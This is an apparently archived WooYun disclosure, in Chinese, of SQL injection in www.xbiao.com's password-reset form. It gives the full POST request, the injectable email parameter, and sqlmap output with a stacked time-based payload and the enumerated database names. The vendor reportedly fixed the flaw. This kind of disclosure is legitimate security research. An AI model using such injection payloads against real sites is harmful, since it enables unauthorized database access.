乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-05: 细节已通知厂商并且等待厂商处理中 2015-07-10: 厂商已经确认,细节仅向厂商公开 2015-07-20: 细节向核心白帽子及相关领域专家公开 2015-07-30: 细节向普通白帽子公开 2015-08-09: 细节向实习白帽子公开 2015-08-24: 细节向公众公开
刚看见厂商说修复了 就去检测了下 结果还真发现了 我 cmd 有些错误 我要去调整 就没继续跑下去了
POST数据包:
POST /user/getpwd HTTP/1.1IP Address: 8.8.8.8'Content-Length: 219Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.xbiao.com:80/Cookie: PHPSESSID=vjifvpc2bk39820cibtikjkkg6; YII_CSRF_TOKEN=06b9f295a0c30f3e707a816cf0c60ae02a4ba20es%3A40%3A%2250fd19bba4235cd360e55eade7b57f2a066beff9%22%3B; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")Host: www.xbiao.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*UserResetPassword%5bemail%[email protected]&YII_CSRF_TOKEN=50fd19bba4235cd360e55eade7b57f2a066beff9
UserResetPassword[email] 处 可注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requsts:---Parameter: UserResetPassword[email] (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: UserResetPassword[email][email protected]';(SELECT * FROM (SELECT(LEEP(5)))XASl)#&YII_CSRF_TOKEN=50fd19bba4235cd360e55eade7b57f2a066beff9---[12:44:49] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.27back-end DBMS: MySQL 5.0.11[12:44:49] [INFO] fetching database names[12:44:49] [INFO] fetching number of databases[12:44:49] [INFO] resumed: 3[12:44:49] [INFO] resumed: information_schema[12:44:49] [INFO] resumed: test[12:44:49] [INFO] resumed: watchavailable databases [3]:[*] information_schema[*] test[*] watch[12:44:49] [INFO] fetched data logged to text files under 'C:\Users\Administratr\.sqlmap\output\www.xbiao.com'[*] shutting down at 12:44:49
危害等级:中
漏洞Rank:10
确认时间:2015-07-10 00:17
漏洞已经修复,感谢@天地不仁 以万物为刍狗
暂无